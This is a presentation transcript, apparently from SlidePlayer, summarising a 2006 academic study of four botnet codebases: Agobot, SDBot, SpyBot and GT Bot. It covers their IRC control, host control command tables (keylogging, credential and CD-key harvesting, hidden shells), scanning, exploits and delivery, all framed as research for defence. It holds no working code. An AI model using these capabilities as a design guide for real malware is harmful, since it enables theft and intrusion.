An Inside Look at Botnets By Paul Barford and Vinod Yegneswaran In Series: Advances in Information Security, Springer, 2006 Presented by Jared Bott.

Slides:



Advertisements
Similar presentations
Botnets ECE 4112 Lab 10 Group 19.
Advertisements

Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
System Security Scanning and Discovery Chapter 14.
 What is a botnet?  How are botnets created?  How are they controlled?  How are bots acquired?  What type of attacks are they responsible for? 
Bots and Botnets CS-431 Dick Steflik. DDoS ● One of the most common ways to mount a Distributed Denial of Service attacks is done via networks of zombie.
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
Botnets Abhishek Debchoudhury Jason Holmes. What is a botnet? A network of computers running software that runs autonomously. In a security context we.
DDos Distributed Denial of Service Attacks by Mark Schuchter.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.
PROJECT IN COMPUTER SECURITY MONITORING BOTNETS FROM WITHIN FINAL PRESENTATION – SPRING 2012 Students: Shir Degani, Yuval Degani Supervisor: Amichai Shulman.
Botnets An Introduction Into the World of Botnets Tyler Hudak
Tyler’s Malware Jeopardy $100 VirusWormSpyware Trojan Horses Ransomware /Rootkits $200 $300 $400 $500 $400 $300 $200 $100 $500 $400 $300 $200 $100 $500.
Introduction to Honeypot, Botnet, and Security Measurement
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Network and Internet Security SYSTEM SECURITY. Virus Countermeasures Antivirus approach ◦Ideal solution: Prevention ◦Not allowing the virus to infect.
Guide to TCP/IP, Second Edition1 Guide To TCP/IP, Second Edition Chapter 6 Basic TCP/IP Services.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
Trend Micro Confidential 9/23/2015 Threat Rules Sharing Advanced Threats Research.
Honeypot and Intrusion Detection System
CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 45 How Hackers can Cripple the Internet and Attack Your PC How Hackers can Cripple the.
Bots Used to Facilitate Spam Matt Ziemniak. Discuss Snort lab improvements Spam as a vehicle behind cyber threats Bots and botnets What can be done.
A N I NSIDE L OOK AT B OTNETS ARO-DHS S PECIAL W ORKSHOP ON M ALWARE D ETECTION, 2005 Written By: Paul Barford and Vinod Yegneswaran University of Wisconsin,
Topics to be covered 1. What are bots,botnet ? 2.How does it work? 4.Prevention of botnet. 3.Types of botnets.
2012 4th International Conference on Cyber Conflict C. Czosseck, R. Ottis, K. Ziolkowski (Eds.) 2012 © NATO CCD COE Publications, Tallinn 朱祐呈.
1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.
A Multifaceted Approach to Understanding the Botnet Phenomenon Authors : Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Computer Science.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
BOTNETS Presented By : Ramesh kumar Ramesh kumar 08EBKIT049 08EBKIT049 A BIGGEST THREAT TO INERNET.
ANTIVIRUS SOFTWARE.  Antivirus software is the most widespread mechanism for defending individual hosts against threats associated with malicious software,
Automated Classification and Analysis of Internet Malware M. Bailey J. Oberheide J. Andersen Z. M. Mao F. Jahanian J. Nazario RAID 2007 Presented by Mike.
CHAPTER 3 Classes of Attack. INTRODUCTION Network attacks come from both inside and outside firewall. Kinds of attacks: 1. Denial-of-service 2. Information.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
AN INSIDE LOOK AT BOTNETS Barford, Paul and Yegneswaran Advances in Information Security, Springer, 2006 Kishore Padma Raju.
Omar Hemmali CAP 6135 Paul Barford Vinod Yegneswaran Computer Sciences Department University of Wisconsen, Madison.
Vulnerability Scanning Vulnerability scanners are automated tools that scan hosts and networks for known vulnerabilities and weaknesses Credentialed vs.
BY SYDNEY FERNANDES T.E COMP ROLL NO: INTRODUCTION Networks are used as a medium inorder to exchange data packets between the server and clients.
Open Malicious Source Symantec Security Response Kaoru Hayashi.
Computer Security Threats CLICKTECHSOLUTION.COM. Computer Security Confidentiality –Data confidentiality –Privacy Integrity –Data integrity –System integrity.
Know your Enemy: Tracking Botnets The Honeynet Project & Research Alliance Presented by: Jonathan Dowdle.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Speaker: Hom-Jay Hom Date:2009/10/20 Botnet Research Survey Zhaosheng Zhu. et al July 28-August
DOS Attacks Lyle YapDiangco COEN 150 5/21/04. Background DOS attacks have been around for decades Usually intentional and malicious Can cost a target.
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
Cosc 4765 Antivirus Approaches. In a Perfect world The best solution to viruses and worms to prevent infected the system –Generally considered impossible.
Published: USENIX HotBots, 2007 Presented: Wei-Cheng Xiao 2016/10/11.
Internet Vulnerabilities & Criminal Activity Internet Forensics 12.1 April 26, 2010 Internet Forensics 12.1 April 26, 2010.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Botnets A collection of compromised machines
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
A lustrum of malware network communication: Evolution & insights
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
VIRUS HOAX + BOTS. VIRUS HOAX + BOTS Group Members Aneeqa Ikram Fatima Ishaque Tufail Rana Anwar Amjad.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Botnets A collection of compromised machines
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
Operating System Security
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Presentation transcript:

An Inside Look at Botnets By Paul Barford and Vinod Yegneswaran In Series: Advances in Information Security, Springer, 2006 Presented by Jared Bott

2 Outline Why Study Botnets? A Brief History of Botnets Bot Study Findings and Implications Analysis of Paper

3 Why? Malicious software is a major problem Reactive methods predominately used today are ultimately insufficient Proactive methods are required Develop a foundational understanding of the mechanisms used by malicious software Develop an open repository of malware information

4 Outline Why Study Botnets? A Brief History of Botnets Bot Study Findings and Implications Analysis of Paper

5 Botnets A botnet is a collection of compromised computers controlled by their attacker Botnets trace their roots from Eggdrop bot Created for network management by Jeff Fisher in 1993

6 Rise of Botnets Motivation for malicious activity is shifting Primary motivation has changed from vandalism and demonstration of programming skills to for- profit activities Identity theft, extortion Backed by organized crime

7 Botnets Today Botnets can be extremely large, with reports of botnets of over 100,000 systems Average size appears to be dropping Total estimated number of systems used in botnets is in the millions

8 Outline Why Study Botnets? A Brief History of Botnets Bot Study Findings and Implications Analysis of Paper

9 Bot Study Objectives Highlight the richness and diversity of bot codebases Identify commonalities between codebases Consider how knowledge of these botnet mechanisms can lead to development of more effective defense mechanisms

10 Bot Study Attributes of bots to analyze Architecture Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

11 Bot Study Four bot codebases Agobot 4.0 pre-release SDBot 05b SpyBot 1.4 GT Bot with DCOM

12 Agobot AKA Gaobot, Phatbot First referenced in October, 2002 Most sophisticated of the four codebases Typically around 20,000 lines of C/C++ Monolithic architecture Adheres to structured design and software engineering principles Modular, standard data structures, code documentation Exhibits creativity in design

13 Agobot Components IRC-based command and control mechanism Large collection of target exploits Ability to launch different kinds of DoS attacks Modules for shell encodings and limited polymorphism Mechanisms to frustrate disassembly by well known tools

14 Agobot Components Ability to harvest local host for sensitive information, such as Paypal passwords and AOL keys through traffic sniffing, key logging or searching registry entries Mechanisms to defend and fortify compromised systems Over 580 variants

15 SDBot First referenced in October, 2002 Hundreds of variants Fairly simple compared to Agobot Slightly over 2,000 lines of C Main source tree does not contain any overtly malicious code modules Published under GPL Primarily provides a utilitarian IRC-based command and control system

16 SDBot Easy to extend Large number of patches that provide more sophisticated malicious capabilities and diffuse responsibility Scanning DoS attacks Sniffers Information harvesting Encryption routines Over 80 patches

17 SpyBot First referenced in April, 2003 Hundreds of variants Fairly compact, around 3,000 lines of C Shares much of SDBot’s command and control engine No explicit attempt to diffuse accountability

18 SpyBot Capabilities NetBIOS, Kuang, Netdevil and KaZaa exploits Scanning capabilities Modules for launching flooding attacks Efficient Does not exhibit modularity or breadth of capabilities of Agobot

19 GT Bot AKA Global Threat Bot, Aristotles First referenced in April, 1998 Over 100 variants Simple design Limited set of functions based on the scripting capabilities of mIRC Includes HideWindow program to keep the bot hidden

20 GT Bot Includes BNC, a proxy system for anonymity Includes psexec.exe to facilitate remote process execution Nothing to suggest it was designed to be extensible Different versions for specific malicious intents With DCOM includes DCOM exploits

21 Bot Codebases Convergence in the set of functions that are available Suggests the possibility that defensive systems may eventually be effective across bot families Bot codebases are at least somewhat extensible

22 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

23 Botnet Control Mechanisms Command language and control protocols are used to operate botnets remotely after target systems have been compromised All analyzed bots base C&C on IRC Disruption of communication can render a botnet useless Network operators can sniff for specific commands in IRC traffic and identify compromised systems

24 Botnet Control Mechanisms Agobot C&C system derived from IRC Standard IRC is used to establish connections IRC and commands developed for Agobot are used for command language SDBot Command language is lightweight version of IRC Has IRC cloning and spying

25 Typical interaction between an SDBot and IRC server

26 Botnet Control Mechanisms SpyBot Command language is a subset of SDBot’s command language GT Bot Simplest command language of the bot families Large variations across different versions

27 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

28 Host Control Mechanisms The mechanisms used by the bot to manipulate a victim host once it has been compromised Fortify the local system against malicious attacks Disable anti-virus software Harvest sensitive information

29 Host Control Mechanisms Agobot Commands to secure system Broad set of commands to harvest sensitive information pctrl commands to list or kill processes running on host inst commands to add or delete autostart entries

30 Agobot Commands CommandDescription pctrl.killKill specified process set from service file pctrl.listsvcReturn list of all services that are running pctrl.killsvcDelete/stop a specified service pctrl.killpidKill specified process inst.asaddAdd an autostart entry inst.asdelDelete an autostart entry inst.svcaddAdds a service to SCM inst.svcdelDelete a service from SCM CommandDescription harvest.cdkeysReturn a list of CD keys harvest. sReturn a list of s harvest. shttpReturn a list of s via HTTP harvest.aolReturn a list of AOL specific information harvest.registryReturn registry information for specific registry path harvest.windowskeysReturn Windows registry information pctrl.listReturn list of all processes

31 Host Control Mechanisms SDBot Limited capabilities Basic remote execution commands Some ability to gather local information Auxiliary patches add more capabilities

32 SDBot Commands CommandDescription sysinfoList host system information (CPU/RAM/OS and uptime) execute parameters Run a specified program (visibility is 0/1) cdkey/getcdkeyReturn keys of popular games e.g., Halflife, Soldier of Fortune etc. CommandDescription download Downloaded specified file and execute if action is 1 killthread Kill specified thread update If bot ID is different than current, download “sdbot executable” and update

33 Host Control Mechanisms SpyBot Similar capabilities to Agobot Local file manipulation Key logging Process/system manipulation, remote command execution

34 SpyBot Commands CommandDescription listprocessesReturn a list of all running processes killprocess Kills the specified process threadsReturns a list of all running threads killthread Kills a specified thread disconnect Disconnect the bot for number seconds rebootReboot the system cd-rom Open/close cd-rom opencmdStarts cmd.exe (hidden) cmd Sends a command to cmd.exe get Triggers DCC send on bot update Updates local copy of the bot code CommandDescription delete Delete a specified file execute Execute a specified file rename Rename a specified file makedir Create a specified directory startkeyloggerStarts the on-line keylogger stopkeyloggerStops the keylogger sendkeys Simulates key presses keyboardlightsFlashes remote keyboard lights 50x passwordsLists the RAS passwords in Windows 9x systems listprocessesReturn a list of all running processes

35 Host Control Mechanisms GT Bot Most limited capabilities Base capabilities are only gathering local system information and running or deleting local files Many versions with more capabilities

36 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

37 Propagation Mechanisms The mechanisms bots use to search for new host systems Traditionally horizontal or vertical scans Horizontal is one port across an address range Vertical is across a port range on an address

38 Propagation Mechanisms Agobot Relatively simple, essentially vertical and horizontal scanning SDBot No scanning or propagation in base distribution Variants with horizontal, vertical scanning and more complex methods

39 Propagation Mechanisms SpyBot Simple horizontal and vertical scanning GT Bot Simple horizontal and vertical scanning Due to simplicity and uniformity of methods, it may be possible to develop statistical finger printing methods to identify scans from botnets

40 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

41 Exploits and Attack Mechanisms Specific methods for attacking known vulnerabilities on target systems Agobot Includes an ever broadening set of exploits Agobot exploits Bagle scanner DCOM scanners MyDoom scanner Dameware scanner NetBIOS scanner Radmin scanner MS-SQL scanner Generic DDoS module

42 Exploits and Attack Mechanisms SDBot No exploits in standard distribution Modules for sending UDP and ICMP packets DoS Numerous variants with exploits Numerous variants with DDoS attack modules

43 Exploits and Attack Mechanisms SpyBot Exploits depend on version of SpyBot Wide range of exploits Evaluated version has attacks on open NetBIOS shares DDoS interface closely related to SDBot UDP, ICMP, and TCP SYN

44 Exploits and Attack Mechanisms GT Bot This variant has RPC-DCOM exploits and Simple ICMP floods Many variants with many exploits and DoS capabilities Bots will likely become more like Agobot, each version having many exploits

45 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

46 Malware Delivery Mechanism The mechanisms bots use to deliver exploits Packers and shell encoders used to compress and obfuscate code SDBot, SpyBot, and GT Bot deliver exploit and encoded malware in one script Agobot separates exploits and delivery Exploit vulnerability and open shell on remote host Encoded malware binary delivered by HTTP or FTP Enables encoder to be used across exploits, streamlining codebase and potentially diversifying the resulting bit streams

47 1. Send exploit 2. Open shell 3. HTTP/FTP File Transfer of Bot Attacker computer (Bot) Target computer Agobot Delivery

48 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

49 Obfuscation Mechanisms The mechanisms that are used to hide the details of what is being transmitted through the network and what arrives for execution on end hosts Only Agobot supports any kind of polymorphism

50 Points of Analysis Botnet Control Mechanisms Host Control Mechanisms Propagation Mechanisms Target Exploits and Attack Mechanisms Malware Delivery Mechanisms Obfuscation Methods Deception Strategies

51 Deception Strategies The mechanisms used to evade detection once a bot is installed on a target host Rootkits Only Agobot has elaborate deception mechanisms Tests for debuggers Tests for VMware Killing anti-virus processes Altering DNS entries of anti-virus software companies to point to localhost

52 Outline Why Study Botnets? A Brief History of Botnets Bot Study Findings and Implications Analysis of Paper

53 Findings and Implications Finding: The overall architecture and implementation of botnets is complex and evolving toward the use of common software engineering techniques. Implication: The regularization of botnet architecture provides insight on potential extensibility and could help to facilitate systematic evaluation of botnet code.

54 Findings and Implications Finding: The predominant remote control mechanism is IRC and in general includes a rich set of commands. Implication: Monitoring botnet activity on IRC channels and disruption of specific channels on IRC servers should continue to be an effective defensive strategy for the time being.

55 Findings and Implications Finding: The host control mechanisms used for harvesting sensitive information from host systems are ingenious and enable data from passwords to mailing lists to credit card numbers to be gathered. Implication: This is one of the most serious results of the study and suggests design objectives for future operating systems and applications.

56 Findings and Implications Finding: There are a wide diversity of exploits for infecting target systems, including many of those used by worms that target well known Microsoft vulnerabilities. Implication: This is yet additional evidence that keeping OS patches up to date is essential and informs requirements for network intrusion detection and prevention systems.

57 Findings and Implications Finding: All botnets include DoS attack capability. Implication: The specific DoS mechanisms in botnets can inform designs for DoS defense.

58 Findings and Implications Finding: All botnets include a variety of mechanisms for avoiding detection once installed. Implication: Development of methods for detecting and disinfecting compromised systems will need to keep pace.

59 Findings and Implications Finding: Shell encoding and packing mechanisms are common. Polymorphism is found only in Agobot. Implication: A major focus on methods for detecting polymorphism may not be needed yet, but encodings will continue to present a challenge for defensive systems.

60 Findings and Implications Finding: Currently there are only a limited set of propagation mechanisms available in botnets. Implication: The specific propagation methods used in these botnets can form the basis for modeling and simulating botnet propagation.

61 Outline Why Study Botnets? A Brief History of Botnets Bot Study Findings and Implications Analysis of Paper

62 Strengths Detailed evaluation of code and capabilities Starting point for malware database Open database would greatly help defensive capabilities Finding commonalities among bots could help create some kind of broad defense

63 Weaknesses Dynamic profiling of bots needs to be done Too many variants of bots to evaluate each and every one Analysis of this kind calls for source code access, which may not be available

64 Improvements Dynamic profiling Analysis points for other kinds of malware

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.